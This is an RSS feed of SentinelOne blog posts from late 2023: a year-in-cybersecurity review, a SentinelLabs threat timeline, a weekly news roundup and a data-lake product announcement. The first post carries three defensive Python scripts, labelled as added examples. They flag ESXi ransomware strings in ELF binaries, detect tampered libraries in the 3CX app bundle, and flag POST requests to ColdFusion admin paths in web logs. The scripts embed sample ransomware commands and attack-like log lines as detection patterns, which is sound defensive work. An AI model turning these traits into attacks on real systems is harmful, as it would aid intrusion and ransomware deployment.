SentinelOne | Next Generation Endpoint Security (https://www.sentinelone.com/), feed built Thu, 28 Dec 2023 18:52:37 +0000

The Best, The Worst and The Ugliest in Cybersecurity | 2023 Edition
https://www.sentinelone.com/blog/the-best-the-worst-and-the-ugliest-in-cybersecurity-2023-edition/
Fri, 29 Dec 2023 14:00:14 +0000

As we get ready to wave goodbye to 2023, this week’s The Good, the Bad and the Ugly takes the opportunity to rewind and revisit the best, the worst, and the ugliest cybersecurity news from the past 12 months.

The Best

Of all The Good things we reported on in cybersecurity this year, there can be no doubt that the most needed was a joined-up, coordinated approach to cyber led from the top, and the Biden-Harris administration’s National Cybersecurity Strategy went a long way toward that end. The strategy is a comprehensive approach to defend critical infrastructure, disrupt threat actors, promote data privacy and security, invest in cyber resilience, and establish international partnerships to combat cyber threats.

It’s a response to the increase in cyber attacks on various sectors in the U.S. and sits alongside international efforts such as the Counter Ransomware Initiative. We hope and expect to see more in 2024.

We reported on plenty of criminals being brought to justice during 2023, including the arrest of core members of the prolific ransomware gang, DoppelPaymer, in a joint operation conducted by Europol, the FBI, and the Dutch police in Germany and Ukraine.

Joseph James O’Connor was another significant capture of the year. Known as PlugWalkJoe, O’Connor was sentenced to five years in prison for various cybercrimes, including his role in the 2020 Twitter Hack, in which he and his associates used SIM swaps along with social engineering tactics to gain access to Twitter’s back-end tools and transfer control of high-profile accounts to various unauthorized users.

Joseph James O’Connor | Source: Reuters

While some accounts were hijacked by the actors themselves, O’Connor sold the access rights of several well-known accounts to third parties. O’Connor was also charged with stealing cryptocurrency, money laundering, cyberstalking, and unauthorized access to TikTok and Snapchat.

Of course, AI has been one of the big themes of 2023. Again, the government, in collaboration with tech companies like OpenAI and Anthropic, has taken a leading role. The “AI Cyber Challenge” (AIxCC), led by the Defense Advanced Research Projects Agency (DARPA), offers up to $20 million in prizes for entries that use artificial intelligence to protect critical U.S. infrastructure from cybersecurity threats.

Leveraging AI to enhance cybersecurity is, of course, core to SentinelOne’s DNA. In 2023, we announced Purple AI, a generative AI assistant dedicated to threat hunting, analysis and response that lets security teams identify and respond to attacks faster and more easily using natural language prompts and responses.

Singularity Purple AI

The Worst

Picking out the worst of The Bad things that happened in cybersecurity in 2023 is a challenging task, given just how many attacks, compromises, breaches and in-the-wild (ITW) exploited vulnerabilities we reported on this year. Among the standout stories of concern was Winter Vivern APT’s exploitation of a zero-day vulnerability (CVE-2023-5631) in Roundcube’s webmail software, used to steal email data from European governments and think tanks.

Casinos MGM and Caesars were among some of the big name victims of the year’s record number of ransomware attacks.

2023 saw a 95% year-on-year increase in extortion attacks as threat actors continue to leverage social engineering, weak or misconfigured cloud assets, and old vulnerabilities to lock files and steal data.

A feature of 2023 ransomware has been a new focus on compromising ESXi hypervisors through a slew of variants built from the leaked Babuk (Babyk) source code. A wave of ESXiArgs attacks targeting ESXi servers was reported early in the year, encrypting extensive amounts of data across servers in the US, Canada, and Central Europe.

ESXi ransomware (XVGV) .rodata segment references to file extensions (left) and the Babuk source code equivalent

A report by SentinelLabs in May detailed how numerous threat actors were capitalizing on the easy availability of leaked Linux ransomware source code to target vulnerable ESXi servers.
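The .rodata strings shown in the figure above are exactly what a first-pass triage script can key on. The following is an added example written for this post, not SentinelLabs tooling and not code from any ransomware family it describes: it parses the section headers of a little-endian ELF64, pulls printable strings from .rodata only (so noise from .text and .data is ignored), and scores the binary on VMware guest-file extensions and ESXi host tooling references. The parser is deliberately minimal, the hint list is an assumed heuristic, and the sample binary is constructed in-script so the script runs offline; pass a real ELF path as the first argument to triage a file.

```python
"""Triage an ELF for ESXi-locker traits by reading its .rodata strings.

Added example for this post, not code from SentinelLabs or from any
ransomware family it describes. The ELF64 parser is minimal (section
headers only, little-endian) and the sample binary below is constructed
in-script so the script runs offline.
"""
import re
import struct
import sys

ELF_HDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes
SEC_HDR = struct.Struct("<IIQQQQIIQQ")         # Elf64_Shdr, 64 bytes

# Guest-file extensions that Babuk-derived ESXi lockers enumerate before
# encryption; several of them together in one binary is a strong hint.
ESXI_EXTS = (b".vmdk", b".vmx", b".vmxf", b".vmsd", b".vmsn",
             b".vswp", b".vmss", b".nvram", b".vmem")
# Host tooling and datastore paths such lockers commonly reference
# (assumed heuristic list, extend from your own samples).
ESXI_HINTS = (b"esxcli", b"vim-cmd", b"/vmfs/volumes")


def elf_sections(data: bytes) -> dict:
    """Map section name -> raw bytes for a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    hdr = ELF_HDR.unpack_from(data, 0)
    shoff, shentsize, shnum, shstrndx = hdr[6], hdr[11], hdr[12], hdr[13]
    raw = [SEC_HDR.unpack_from(data, shoff + i * shentsize) for i in range(shnum)]
    str_off, str_size = raw[shstrndx][4], raw[shstrndx][5]   # sh_offset, sh_size
    strtab = data[str_off:str_off + str_size]
    sections = {}
    for sh in raw:
        name = strtab[sh[0]:strtab.index(b"\0", sh[0])].decode("ascii", "replace")
        sections[name] = data[sh[4]:sh[4] + sh[5]]
    return sections


def triage_esxi_locker(data: bytes) -> dict:
    """Score an ELF on ESXi-specific strings found in .rodata only."""
    rodata = elf_sections(data).get(".rodata", b"")
    strings = re.findall(rb"[\x20-\x7e]{4,}", rodata)
    exts = sorted({e for s in strings for e in ESXI_EXTS if e in s})
    hints = sorted({h for s in strings for h in ESXI_HINTS if h in s})
    return {"extensions": exts, "hints": hints,
            "suspicious": len(exts) >= 3 or bool(hints)}


def build_sample_elf(rodata: bytes) -> bytes:
    """Constructed minimal ELF64: header | .shstrtab | .rodata | 3 section headers."""
    shstrtab = b"\0.shstrtab\0.rodata\0"      # name offsets: 1 and 11
    shstr_off = ELF_HDR.size
    rodata_off = shstr_off + len(shstrtab)
    shoff = rodata_off + len(rodata)
    ehdr = ELF_HDR.pack(b"\x7fELF\x02\x01\x01" + b"\0" * 9,
                        2, 62, 1, 0, 0, shoff, 0, ELF_HDR.size, 0, 0,
                        SEC_HDR.size, 3, 1)
    null_sh = SEC_HDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    shstr_sh = SEC_HDR.pack(1, 3, 0, 0, shstr_off, len(shstrtab), 0, 0, 1, 0)
    rodata_sh = SEC_HDR.pack(11, 1, 2, 0, rodata_off, len(rodata), 0, 0, 1, 0)
    return ehdr + shstrtab + rodata + null_sh + shstr_sh + rodata_sh


# Constructed sample mimicking the string table of a Babuk-style ESXi locker.
SAMPLE_ELF = build_sample_elf(
    b"\0.vmdk\0.vmx\0.vswp\0esxcli vm process kill\0/vmfs/volumes\0Hello\0")

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ELF
    print(triage_esxi_locker(blob))
```

Restricting the search to .rodata is what keeps false positives down: a backup agent or VMware tooling legitimately contains the same extensions, but a statically linked locker typically carries the extension list, the esxcli kill command and the /vmfs/volumes datastore path together in one read-only string table. Treat the score as a reason to look closer, not as a verdict, and feed confirmed samples back into YARA rules.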

The Ugliest

What have 3CX, JumpCloud and macOS users involved with cryptocurrency got in common? You guessed it: North Korea. From supply chain attacks to espionage and financially-motivated cybercrime, DPRK-aligned threat actors have been keeping us busy and many victims awake at night throughout 2023.

The SmoothOperator campaign disclosed in early 2023 was a supply chain attack targeting both macOS and Windows users of the 3CX desktop application, exfiltrating victim data over HTTPS using a custom data encoding scheme. The macOS version of the trojanized 3CX application was delivered via a maliciously crafted libffmpeg.dylib contained within the application bundle’s Electron Framework folder:

../3CX Desktop App.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Libraries/libffmpeg.dylib

Although the full extent of the attack remains unclear, reports at the time suggested that over 240,000 IP addresses were using the trojanized 3CX Phone System Management Console.
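Because the trojanized 3CX build carried the vendor’s own signature, code signature checks alone were no help; what catches a swapped native library is a hash manifest of the bundle taken from a build you have vetted (or published by the vendor) and re-checked on the endpoint. The script below is an added example for this post, not 3CX code and not the SentinelOne agent: it records SHA-256 hashes of every .dylib/.so/.node under a bundle root and later diffs the live tree against that manifest, reporting modified, missing and unexpected libraries. The demo builds a throwaway bundle in a temp directory using the libffmpeg.dylib path quoted above, so it runs anywhere without a real 3CX install.

```python
"""Pin and re-verify the native libraries inside an app bundle.

Added example for this post; not 3CX code and not the SentinelOne agent.
It records SHA-256 hashes of every .dylib/.so/.node under a bundle root
and later diffs the live tree against that manifest. The demo builds a
throwaway bundle in a temp directory with the libffmpeg.dylib path from
the post, so it runs anywhere without a real 3CX install.
"""
import hashlib
import json
import sys
import tempfile
from pathlib import Path

NATIVE_SUFFIXES = (".dylib", ".so", ".node")


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large frameworks do not load into RAM."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def bundle_manifest(root) -> dict:
    """Relative POSIX path -> SHA-256 for every native library under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*"))
            if p.is_file() and p.suffix in NATIVE_SUFFIXES}


def verify_bundle(root, pinned: dict) -> dict:
    """Diff the live bundle against a pinned manifest."""
    live = bundle_manifest(root)
    return {
        "modified": sorted(k for k in pinned if k in live and live[k] != pinned[k]),
        "missing": sorted(k for k in pinned if k not in live),
        "unexpected": sorted(k for k in live if k not in pinned),
    }


# Library path named in the post, relative to the .app bundle root.
FFMPEG_REL = ("Contents/Frameworks/Electron Framework.framework/"
              "Versions/A/Libraries/libffmpeg.dylib")


def demo_tampered_bundle() -> dict:
    """Constructed scenario: pin a clean bundle, then swap libffmpeg.dylib."""
    with tempfile.TemporaryDirectory() as tmp:
        app = Path(tmp, "3CX Desktop App.app")
        lib = app / FFMPEG_REL
        lib.parent.mkdir(parents=True)
        lib.write_bytes(b"clean build bytes")
        asar = app / "Contents/Resources/app.asar"      # not a native lib, untracked
        asar.parent.mkdir(parents=True)
        asar.write_bytes(b"js")
        pinned = bundle_manifest(app)
        lib.write_bytes(b"trojanized build bytes")            # in-place swap
        (lib.parent / "libextra.dylib").write_bytes(b"dropped")  # added library
        return verify_bundle(app, pinned)


if __name__ == "__main__":
    if len(sys.argv) == 3 and sys.argv[1] == "pin":
        print(json.dumps(bundle_manifest(sys.argv[2]), indent=2))
    elif len(sys.argv) == 4 and sys.argv[1] == "verify":
        with open(sys.argv[2]) as fh:
            print(json.dumps(verify_bundle(sys.argv[3], json.load(fh)), indent=2))
    else:
        print(json.dumps(demo_tampered_bundle(), indent=2))
```

Usage is `python bundle_pin.py pin "/Applications/3CX Desktop App.app" > 3cx.json` after vetting a build and `python bundle_pin.py verify 3cx.json "/Applications/3CX Desktop App.app"` on each endpoint. The manifest has to come from a build you trust for an independent reason (vendor-published hashes, a reproducible build, or sandbox analysis); pinning a poisoned update just pins the poison, which is the caveat the 3CX case makes obvious.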

Breaches of government networks are always among the ugliest of the Ugly, and several concerning attacks were recorded throughout 2023. In December, CISA reported that a high-severity vulnerability in Adobe’s ColdFusion, tracked as CVE-2023-26360, had been used earlier in the year to gain initial access to U.S. government servers.

CISA highlighted two incidents in which CVE-2023-26360 was used to compromise federal agency systems. Both involved outdated server software vulnerable to multiple CVEs, with threat actors leveraging the vulnerability to drop malware via HTTP POST requests to the ColdFusion-associated directory path. It seems the government still has plenty of work to do to implement its own cybersecurity best practices.
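The detail worth operationalizing from those two incidents is the access pattern itself: POST requests from outside sources to ColdFusion administrative and script directories. The script below is an added example for this post, not from CISA’s advisory and not SentinelOne tooling: it parses combined-format access log lines, keeps only external POSTs whose path begins with an assumed watch-list of ColdFusion prefixes, and groups them by source IP. The watch-list, the internal ranges and the log lines are all assumptions or constructed samples; tune the prefixes to the paths actually served by your deployment.

```python
"""Flag HTTP POSTs to ColdFusion admin/script paths in web access logs.

Added example for this post, not from CISA's advisory or SentinelOne
tooling. The watch-list prefixes, internal ranges and log lines are
assumptions and constructed samples; tune them to your deployment.
"""
import re
import sys
from collections import defaultdict

# Apache/nginx "combined" log format; IIS logs need a different regex.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumed watch-list: ColdFusion admin and script directories that should
# rarely, if ever, receive POSTs from arbitrary internet sources.
WATCH_PREFIXES = ("/cfide/", "/cf_scripts/")
# Assumed internal ranges whose admin traffic is expected; tune locally.
ALLOWED_SOURCES = ("10.", "192.168.")

# Constructed sample log lines (documentation IP ranges, fictional timestamps).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2023:02:14:31 +0000] "POST /CFIDE/administrator/index.cfm HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [10/Dec/2023:02:14:40 +0000] "POST /cf_scripts/scripts/ajax/upload.cfm HTTP/1.1" 200 318 "-" "python-requests/2.31"
10.20.0.5 - - [10/Dec/2023:02:14:55 +0000] "POST /CFIDE/administrator/index.cfm HTTP/1.1" 200 488 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2023:02:15:02 +0000] "GET /index.cfm HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2023:02:15:09 +0000] "POST /login.cfm HTTP/1.1" 302 0 "-" "Mozilla/5.0"
garbage line that does not parse
"""


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_posts(lines, prefixes=WATCH_PREFIXES, allowed=ALLOWED_SOURCES) -> dict:
    """Group external POSTs to watched ColdFusion paths by source IP."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].lower().startswith(prefixes):   # case-insensitive path match
            continue
        if rec["ip"].startswith(allowed):                   # skip expected admin sources
            continue
        hits[rec["ip"]].append((rec["ts"], rec["path"], int(rec["status"])))
    return dict(hits)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            findings = suspicious_posts(fh)
    else:
        findings = suspicious_posts(SAMPLE_LOG.splitlines())
    for ip, events in findings.items():
        print(f"{ip}: {len(events)} POST(s) to ColdFusion paths")
        for ts, path, status in events:
            print(f"    {ts} {status} {path}")
```

Two caveats a practitioner will hit immediately: behind a load balancer the client address is in `X-Forwarded-For`, not the first field, so the regex has to change; and a 200 on a POST to an admin path tells you the request was served, not that it succeeded, so pair the hit with web-shell file creation events on the server. None of this substitutes for patching; both incidents CISA described ran ColdFusion builds that were already out of support.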

Finally, it’s been a tough year across OSes in terms of in-the-wild exploitation of vulnerabilities, but it appears to have been a record year for Apple’s increasingly troubled iOS platform, with 19 zero days reported as being abused by threat actors in 2023. The phrase “Apple is aware of a report that this issue may have been exploited…” may have never been more oft-seen by Apple users than this year.

Google HQ, aka “GooglePlex”, sits 7 miles from Apple Campus and staff there also appear to have had their hands full patching security bugs throughout 2023. Among the more severe bugs patched this year were:

  • CVE-2023-2033 (CVSS score: 8.8) – Type Confusion in V8
  • CVE-2023-2136 (CVSS score: 9.6) – Integer overflow in the Skia graphics library
  • CVE-2023-3079 (CVSS score: 8.8) – Type Confusion in V8
  • CVE-2023-4863 (CVSS score: 8.8) – Heap buffer overflow in WebP
  • CVE-2023-5217 (CVSS score: 8.8) – Heap buffer overflow in vp8 encoding in libvpx

However, the WebP vulnerability likely had the largest impact on users, as the flawed libwebp library is embedded not only in browsers but in non-browser products from Apple, Google, Microsoft, Mozilla and many others. The bug in the widely used image encoding and compression library was first reported to Apple by Citizen Lab as part of an in-the-wild attack.

GitHub commit in libwebp related to CVE-2023-4863

Microsoft, meanwhile, has continued to patch up its regularly exploited backlog of vulnerabilities, while at times ignoring newly-discovered security issues. In June, the company said that a bypass found by researchers that can allow malware to be delivered to any Teams account from external accounts did not ‘meet the bar for immediate servicing’. The response came as a surprise as researchers showed that all MS Teams accounts running in the default configuration were susceptible to their PoC attack.

Conclusion

So much for the highlights and low spots of 2023: You can find more on all these stories as well as all the others we reported on this year right here.

Our regular weekly roundups will return next Friday; in the meantime, let us wish you a happy and secure New Year 2024 from all of us here at SentinelOne!

12 Months of Fighting Cybercrime & Defending Enterprises | SentinelLabs 2023 Review
https://www.sentinelone.com/blog/12-months-of-fighting-cybercrime-defending-enterprises-sentinellabs-2023-review/
Wed, 27 Dec 2023 16:10:30 +0000

The last twelve months have been unprecedented in cybersecurity. Multiple state-aligned hacktivist groups marched to the forefront of concerns as 2023 saw the Russian invasion of Ukraine continue into its second year and a new cyber battlefront open up alongside the kinetic war between Israel and Hamas.

Meanwhile, despite new government initiatives and international cooperation to combat cybercrime, ransomware continues to be a top challenge for enterprises, in an environment where cloud assets represent new targets and LLMs offer both defenders and attackers new tools and new opportunities. Throughout the year, SentinelLabs has been tracking, identifying and disclosing information on these and other issues to help organizations and defenders stay ahead of the threats to their business operations.

All our research and threat intelligence posts can be found on the SentinelLabs home page, but for a quick recap of the year’s main cybersecurity events, take a scroll through the 2023 timeline below.

January

In January, we reported on pro-Russia hacktivist group NoName057(16), describing its attacks on Ukraine and NATO organizations as well as its targeting of the 2023 Czech presidential election. We identified a volunteer-fueled DDoS program operating over public Telegram channels and described its DDoSia malware in detail. We also revealed how the group, previously reported on for targeting both the Polish government and the Danish financial sector, abused GitHub to host its toolkit and offered payments to its most impactful contributors.

In January 2023, we also reported on DragonSpark, a cluster of opportunistic attacks against organizations in East Asia. The threat actors used Golang malware that implemented an uncommon technique to hinder static analysis and evade detection: Golang source code interpretation.

February

SentinelLabs observed the first ELF variant of Clop ransomware and reported on its flawed encryption method, allowing us to develop and publish a decryptor for the malware.

In February, we also exposed a cluster of virtualized .NET malware loaders being distributed through malvertising attacks. Dubbed MalVirt, the loaders were seen distributing the Formbook family of malware and disguising C2 traffic by beaconing to random decoy servers hosted on providers such as Azure and Namecheap.

In other research published this month, SentinelLabs in collaboration with QGroup GmbH identified a new threat cluster tracked as WIP26 engaging in targeted espionage activities against telecommunications businesses. WIP26 also relies heavily on public cloud infrastructure to disguise malicious traffic, abusing Microsoft 365 Mail and Google Firebase services for C2 purposes.

March

Telcos were also the targets of Operation Tainted Love, this time in the Middle East. We disclosed how the campaign, believed to be conducted by Chinese cyberespionage actors, was an evolution of Operation Soft Cell. The initial attack phase involved infiltrating Internet-facing Microsoft Exchange servers to deploy webshells for command execution. Once a foothold had been established, the attackers deployed custom credential theft malware.

Also in March we reported on the evolution of AlienFox, a comprehensive, modular toolset for credentials harvesting against multiple cloud service providers.

April

Transparent Tribe (aka APT36) is a suspected Pakistan-based threat group active since at least 2013. In April, SentinelLabs observed this long-running threat actor expand its interest into the Indian education sector through a cluster of malicious documents staging Crimson RAT. Previously focused on Indian military and government personnel, the threat actor was observed distributing malicious education-themed content hosted on known APT36 infrastructure. The malicious documents stage Crimson RAT using Microsoft Office macros or OLE embedding.

In addition, some Crimson RAT variants were identified using cracked versions of the commercial obfuscator Eazfuscator to obfuscate their code. This represents a change in tactics from earlier versions, which relied on the Crypto Obfuscator tool for the same purpose.

May

The leak of Babuk source code back in 2021 has led to multiple ransomware variants and contributed to a widely expanded crimeware ecosystem. In May 2023, SentinelLabs revealed how this same source code was behind 10 different ransomware families targeting VMware ESXi, potentially enabling new threat actors who might otherwise lack the technical skills to target Linux systems. Due to the prevalence of ESXi in on-prem and hybrid enterprise networks, these hypervisors are valuable targets for ransomware.

In May, the SentinelLabs team also disclosed Operation Magalenha, a long running campaign by a Brazilian threat actor targeting Portuguese financial institutions for credentials and PII theft.

June

Across May and June, SentinelLabs released reports on DPRK-aligned threat actor Kimsuky. In collaboration with NK News, we disclosed a targeted social engineering campaign against experts in North Korean affairs from the NGO sector. The campaign focused on theft of email credentials, delivery of reconnaissance malware, and theft of NK News subscription credentials.

A hallmark of the activity was establishing initial contact and developing a rapport with targets by impersonating industry figures before initiating any malicious activity, a tactic also seen in DPRK-aligned cybercrime aimed at cryptocurrency exchanges.

If the target engages in the conversation, Kimsuky uses the opportunity to deliver a spoofed URL to a Google document, which redirects to a malicious website specifically crafted to capture Google credentials. Kimsuky has also been seen delivering weaponized Office documents that execute the ReconShark malware.

July

Cloud security came to the fore in July through both crimeware and APT intrusions. We reported on a cloud credentials stealing campaign that had expanded from targeting AWS cloud instances to include both Azure and Google Cloud. Primarily seeking out exposed Docker instances, crimeware actors looked to deploy a worm-like propagation module via script-based and UPX-packed Golang-based ELF binaries.

Elsewhere, SentinelLabs reported that an intrusion at cloud-based IT management service company JumpCloud turned out to have infrastructure connections to DPRK-aligned threat activity. The intrusion bore links to the earlier 3CX SmoothOperator campaign we reported on in March.

August

North Korean-aligned threat actors were having a busy year throughout 2023, but not all their targets were in the west. In August, we identified intrusions into the Russian missile engineering organization NPO Mashinostroyeniya, a sanctioned entity that possesses highly confidential intellectual property on sensitive missile technology currently in use or under development for the Russian military.

Our investigation uncovered an email trove leaked from the victim organization that revealed two separate sets of activity. We were able to establish a connection between each cluster of activity and reveal that a more significant network intrusion had occurred than the victim organization realized.

Chinese adversaries also came to our attention this month after we identified malware and infrastructure directed at the Southeast Asia gambling sector. We observed indicators that pointed to the China-aligned BRONZE STARLIGHT group, a suspected Chinese ‘ransomware’ group whose main goal appears to be espionage rather than financial gain, using ransomware as a means of distraction or misattribution. However, exact attribution remains unclear due to the complex interconnections between various Chinese APT groups.

September

Transparent Tribe came to our attention for a second time in 2023 via distribution of its CapraRAT malware in a novel YouTube-like Android application we dubbed CapraTube. We identified three Android application packages mimicking the appearance of YouTube but which also requested spyware-like permissions.

In September, SentinelLabs also hosted its second LABScon event, featuring talks from leaders across the cybersecurity industry. Among the keynotes was Tom Hegel’s presentation on how China uses strategic intrusions in under-monitored regions such as Africa to further and strengthen its regional goals.

SentinelLabs’ Aleksandar Milenkoski, in collaboration with QGroup, reported on yet another adversary targeting telcos. Dubbed Sandman, the previously unreported threat actor has targeted organizations across the Middle East, Western Europe and the South Asian subcontinent with a novel modular backdoor that utilized the LuaJIT platform.

October

The shocking events in Israel in October 2023 and their aftermath may yet come to define much of the headlines to come in 2024, but in terms of cyber activity there is still a lack of clarity as different hacktivist groups pursue various goals in support of one side or another.

Our initial reporting on state-sponsored activity emerging from events on the ground aimed to highlight adversaries-of-interest to the cybersecurity community at large in an effort to better coordinate reporting and help to understand the threat model facing organizations.

November

Continuing on from October’s activity, we reported on Arid Viper’s SpyC23 malware and the group’s espionage campaign targeting Android devices.

This long-running campaign through 2022 and 2023 involves weaponized apps posing as the Telegram messaging app or a romance-themed messaging app called ‘Skipped Messenger’. Our report highlighted how Arid Viper had developed several newer SpyC23 versions delivered via social engineering. Once installed, the spyware gained a high degree of control over the victim’s device, including the ability to make calls without user interaction, capture microphone and audio input, and collect sensitive data such as the phone’s contact list.

Of course, 2023 has also been the breakout year for AI, and threat actors have not been slow to jump on the bandwagon either. In November, we reported on Predator AI, a new Python-based infostealer and hacktool designed to target cloud services. Advertised through Telegram channels related to hacking, the main purpose of Predator is to facilitate web application attacks against various commonly used technologies, including content management systems (CMS) like WordPress, as well as cloud email services like AWS SES.

December

We rounded out the year with two reports on earlier themes. In joint research between SentinelLabs, PwC and Microsoft Threat Intelligence, we published further intelligence on the Sandman APT we reported on at September’s LABScon, noting that Sandman and STORM-0866/Red Dev 40 share infrastructure control and management practices. Importantly, we described commonalities between two distinct malware strains: the LuaDream malware and the KEYPLUG backdoor.

In our final report of the year, we turned to activity attributed to Gaza Cybergang, a long-running cluster of Hamas-aligned threat activity known since 2012. Tracking activity spanning from late 2022 until late 2023, we observed that the group introduced a new backdoor to their malware arsenal, Pierogi++, used in targeting primarily Palestinian entities.

These activities are likely aligned with the tensions between Hamas and Fatah, whose reconciliation attempts had been stagnating before and after the outbreak of the Israel–Hamas war. We describe the development of Pierogi++ and highlight overlaps in targeting that suggest the Gaza Cybergang sub-groups have likely been consolidating.

Conclusion

This year as last, SentinelLabs has continued its mission to keep defenders abreast of the latest developments and trends across crimeware, APT and other cyber threat activity. Aside from the research highlighted here, there’s more to be found across our From the Front Lines series of posts and our published and forthcoming videos of talks from LABScon 2023.

You can also meet the SentinelLabs team in our quarterly threat briefings.

We’ll be back in 2024 with more security research and threat intelligence reporting. In the meantime, we wish you all a happy, secure and peaceful New Year and 2024.

The Good, the Bad and the Ugly in Cybersecurity – Week 51
https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-51-6/
Fri, 22 Dec 2023 15:43:20 +0000

The Good | Latest Global Crackdown Hailed a Success With 3,500 Cybercriminals Arrested and $300 Million in Funds Seized

3,500 suspected cybercriminals of all levels found themselves nabbed this week by a major international law enforcement initiative dubbed Operation HAECHI IV. The arrests were accompanied by the confiscation of a staggering $300 million in illegal gains. The half-year long operation, spearheaded by South Korean authorities, saw collaboration with agencies from 34 nations, including major players such as the United States, the United Kingdom, Japan, and India.

This expansive operation unfolded between July and December 2023, with a primary focus on threat actors engaged in a spectrum of cybercrimes spanning e-commerce and investment fraud, business email compromise (BEC), voice phishing, online sextortion, and illicit online gambling. Additionally, Interpol identified and froze 82,112 bank accounts across the 34 participating countries linked to these crimes and fraudulent activities.

The operation revealed two key threat trends that continue to gain traction in the current cybercrime world. The first focuses on digital investment frauds and NFT investment platforms that operate briefly before a final “rug pull”, where the scammers abscond with all invested funds and erase all traces of their existence. The second adds to existing concerns about the use of artificial intelligence (AI) by threat actors. HAECHI found that the fraudsters leveraged AI and deepfake tools to mimic real individuals’ voices to further their impersonation scams.

Interpol has emphasized the gravity of the $300 million seizure, describing illicit proceeds on that scale as a clear driver of the growth of transnational organized crime. Global involvement in major operations like HAECHI continues to underscore the need to disrupt the underground financial infrastructure that funds and supports hierarchies of cyber threat actors and groups.

The Bad | Chameleon Banking Trojan Gets a Feature Upgrade Allowing Hackers to Steal Android Device PINs

Android users were put on high alert this week with news of a novel version of Chameleon banking trojan enabling hackers to steal device PINs. Security researchers reporting on the latest iteration noted that targets have spread to include users in the UK and Italy.

Analysis of the resurgence indicates that Chameleon is now distributed through an off-the-shelf Dropper-as-a-Service (DaaS) called Zombinder, allowing the trojan to masquerade as a Google Chrome web browser. Zombinder attaches malware to legitimate Android apps, tricking victims to unknowingly use the intended app while dangerous code runs in the background.

Source: ThreatFabric

The latest Chameleon variant introduces two notable features. Firstly, on devices running Android 13 and later it displays an HTML page prompting the victim to grant the app access to the Accessibility service. Android 13 introduced the “Restricted Setting” protection, which blocks sideloaded apps from being granted Accessibility directly; by detecting Android 13 or 14, the malware instead walks the user through the manual steps needed to enable it, defeating that protection. Secondly, Chameleon uses the Accessibility service to disrupt biometric operations like fingerprint and face unlock, forcing a fallback to PIN or password authentication. The trojan captures the entered PIN or password, allowing it to unlock the device at will for malicious activity concealed from the user.

These feature enhancements speak to the adaptability of the new Chameleon variant, positioning it as a more potent threat in the mobile banking landscape. To mitigate the threat, users are advised to avoid downloading Android package files (APKs) from unofficial sources, as this is the primary distribution method for the Zombinder service. Users should also ensure that Play Protect is enabled and conduct regular device scans for malware and adware.

The Ugly | Millions Impacted In Data Breach of Major Electronic Health Record Software Company

ESO Solutions informed their customers this week of a ransomware attack on their systems, which compromised the personal data of 2.7 million patients. The company is a major supplier of electronic health record (EHR) products for various healthcare organizations and fire departments across the U.S. As of this writing, no ransomware group has claimed responsibility for the ESO attack.

According to the notice, the initial attack occurred in late September and involved data exfiltration before the attackers encrypted several company systems. This sequence points to double extortion, where victims are pressured on two fronts: first to pay a ransom for a decryptor, and then under the threat of having the stolen files and data leaked or sold online. This strategy amplifies the impact of ransomware attacks and leaves the victim with an unpleasant dilemma: paying the ransom funds the attackers’ future campaigns, while refusing to pay risks exposure of the stolen sensitive information.

In the attack on ESO, the attackers were able to access a machine containing sensitive personal data of several ESO clients, including full names, dates of birth, phone numbers, patient account/medical record numbers, injury type and date, diagnosis information, treatment type and date, procedure details, and Social Security Numbers (SSNs).

ESO Solutions has confirmed that, in addition to notifying the FBI and state authorities, it took affected systems offline immediately and successfully restored operations from viable backups. The company also stated that, so far, no evidence has been found that the compromised data has been misused. To mitigate the short- and long-term risks post-breach, ESO has offered 12 months of identity monitoring coverage to affected individuals.

Transforming Security and Log Analytics | Welcome to Singularity Data Lake
https://www.sentinelone.com/blog/transforming-security-and-log-analytics-welcome-to-singularity-data-lake/
Thu, 21 Dec 2023 14:00:53 +0000

It’s an undeniable fact: organizations today are swamped with a massive volume of data spanning users, devices, and networks. This increase in data volume is a result of accelerating digital transformation, compounded by the point security tooling introduced to stay ahead of adversaries.

Security is a big data problem. This data, while invaluable for proactive threat mitigation, often proves to be a challenge to collect, normalize, and analyze, especially when scattered across siloed tools and systems.

Legacy data solutions lack flexibility, scalability, and are cost prohibitive, preventing organizations from achieving the required level of security management. As the cybersecurity landscape continues to evolve, a robust, scalable, and cost-effective data solution becomes a necessity.

It is reported that 60% of all SIEM and Data Lake projects fail. One of the primary reasons is the sheer complexity of ingesting and normalizing different data sources into a single place. Many organizations have to create dedicated teams of IT and Security engineers to spend days grappling with data ingestion or managing parsers. In essence, teams are spending more time configuring prerequisites than focusing on security operations.

The Future of Enterprise Security Data and Analytics

That’s where SentinelOne can help with Singularity Data Lake. This solution empowers businesses to centralize and transform data into actionable intelligence for real-time investigation and response with our AI-powered, unified Data Lake. Singularity Data Lake is a cost-effective, high-performance security and log analytics platform converging SIEM, XDR, and Log Analytics into one solution.

